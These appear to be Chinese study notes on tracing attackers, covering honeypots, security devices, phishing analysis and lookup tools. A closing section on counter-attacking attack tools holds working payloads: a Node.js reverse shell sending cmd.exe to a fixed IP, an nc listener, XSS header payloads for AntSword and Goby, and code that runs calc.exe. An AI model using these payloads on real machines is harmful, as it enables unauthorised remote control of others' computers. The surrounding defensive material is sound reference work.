---
寻找到真实身份

---



# 攻击源的获取



## 溯源方式概览

> **攻击源 :**
>
> 攻击者ip ,  域名 , 后门 , 攻击组件,  webshell



> **获取攻击源的方式 : **
>
> 蜜罐,  安全设备 , 钓鱼邮件,  日志分析

**详细请查看,   溯源方法.pdf**

## 蜜罐

> **蜜罐溯源的两种常见方式 : **
>
> 1. 网站上插入特定的js文件
> 2. 网站上想实现需要下载某插件



> **蜜罐分类 : **
>
> 1. 低交互蜜罐 : 模拟服务器, 获取信息比较少, 部署环境低安全 , 说几道的信息少 . 连接方式
> 2. 中交互蜜罐:  比较真实的模拟系统, 修改过的操作系统 , 部署环境高, 比较安全 , 收集信息相对较多 , 请求方式
> 3. 高交互蜜罐:  真实主机 , 不安全 , 部署环境要求高,  配置难, 维护难  , 收集信息多 , 收集所有的信息



> 开源蜜罐: `Hfish` , 这个是免费的, 可以自己搭建.
>
> 其他蜜罐:
>
> [点击进入:  观安][https://www.idss-cn.com/plus/list4fd1.html]
>
> [点击进入: 知道创宇][https://mg.yunaq.com/]
>
> 谛听(长亭科技)
>
> 蜃景(360)
>
> 春秋云阵(永信至诚)
>
> 幻云(锦行科技)
>
> 明鉴迷网(安恒)
>
> 御阵(腾讯)
>
> 潜听(天融信)
>
> 幻影(非凡安全)



## 安全设备

> 全流量平台(态势感知),  waf  , EDR(终端防护)

### 态势感知

全面感知网络安全威胁态势、洞悉网络和应用运行的健康状态、通过全流量分析技术实现完整的网络攻击溯源取证

### waf

专注于网站和web应用的防护

### EDR

主动发现来自外部或内部的各类安全威胁。同时，基于端点的背景数据、恶意软件行为以及整体的高级威胁的生命周期的角度进行全面的检测和响应



## 钓鱼邮件

> 通过分析钓鱼邮件, 可以得到:
>
> 1. 发件id
> 2. ip地址
> 3. 钓鱼服务器, 渗透拿下权限, 收集信息
> 4. 恶意样本
> 5. 注册信息, 邮箱, 域名, 注册商
> 6.  可能得到C2地址 ,  排查内部 , dns解析记录



# 溯源的方法

### 方法概览

攻击ip : 地理位置, 攻击队资产

手机号: 支付宝, 微信 , qq

虚拟id : 搜索引擎, 社交平台

远控域名: whois , 手机邮箱

攻击样本: 沙箱提取c2

其他: 通过数据的`user-agent`



### 威胁情报平台

https://www.secpulse.com/archives/173479.html

https://www.virustotal.com/　　VirusTotal

https://x.threatbook.cn/　　微步在线-微步情报社区

https://ti.qianxin.com/　　奇安信威胁情报

https://ti.360.net/　　360威胁情报中心

https://www.venuseye.com.cn/　　启明星辰威胁情报

https://redqueen.tj-un.com　　天际友盟REDQUEE安全智能服务平台

https://poma.nsfocus.com/　　绿盟的威胁分析中心



### ip反查

https://www.chaipip.com/　　高精度IP地址查询-查IP

https://www.opengps.cn/Data/IP/ipplus.aspx　　高精度IP定位

https://www.ipip.net/ip.html　　ip反查

http://ip.yqie.com/　　ip地址反向查询

http://qd.yyimg.com/act/index/id/　　百度ID反查

https://www.reg007.com/　　注册网站反查

https://ip.rtbasia.com/  tbasia（IP查询）

https://www.ipplus360.com/ ipplus360（IP查询）

https://tool.lu/ip/ IP地址查询在线工具



### 在线云沙箱

https://ata.360.cn/detection　　360沙箱云

https://s.threatbook.cn/　　微步云沙箱

https://www.virustotal.com/gui/home/upload　　VirusTotal平台

https://www.maldun.com/submit/submit_file/　　魔盾安全分析平台

https://app.any.run/　　Any.Run交互式恶意软件分析平

https://habo.qq.com/　　腾讯哈勃系统

https://mac-cloud.riskivy.com　　FreeBuf × 漏洞盒子「大圣云沙箱

# 溯源案例

https://www.sohu.com/a/468288041_120747399 境外黑客钓鱼邮件

https://zhuanlan.zhihu.com/p/349611368 真实钓鱼邮件溯源

https://www.freebuf.com/articles/web/254538.html 傀儡机

https://github.com/ffffffff0x/1earn/blob/master/1earn/Security/BlueTeam/%E5%BA%94%E6%80%A5.md 工具



# 攻击工具的反制

> 主要是通过 **命令注入 + rce ** 这个思路进行反制



## 蚁剑反制

AntSword v2.0.7.1 存在xss 漏洞, 可以基于 nodejs 直接在攻击者的电脑上反弹shell

> nodejs 的rce代码
>
> ```
> var net = require("net"), sh = require("child_process").exec("cmd.exe");
> var client = new net.Socket();
> client.connect(10086, "192.168.13.128", function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});
> 
> ```



> 测试xss 漏洞
>
> ：<?php header('HTTP/1.1 500 '); ?>



> 反弹shell
>
> ```
> var net = require("net"), sh = require("child_process").exec("cmd.exe");
> var client = new net.Socket();
> client.connect(10084, "192.168.13.129", function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});
> 
> <?PHP
> header("HTTP/1.1 500 Not ");
> 
> ```



之后在 kali中输入: 

```
nc -lvvp 10086
```

ok , 如果成功的话, 就可以进行监听了



## Goby反制

> xss 代码
>
> ```
> <?php
> header("X-Powered-By: PHP//)>");
> ?>
> ```

> 弹出计算器
>
> <?php
>
> header("X-Powered-By: PHP/");
>
> ?



> 利用cs
>
> 1.js：
>
> (function(){
>
> require('child_process').exec('calc.exe');
>
> })();



## sqlmap反制

> 构造特殊的get或者post注入点来等待攻击者使用sqlmap扫描

> ![image-20230714174325317](https://raw.githubusercontent.com/QDGSCLOUD/BJYH_picture/main/img/image-20230714174325317.png)







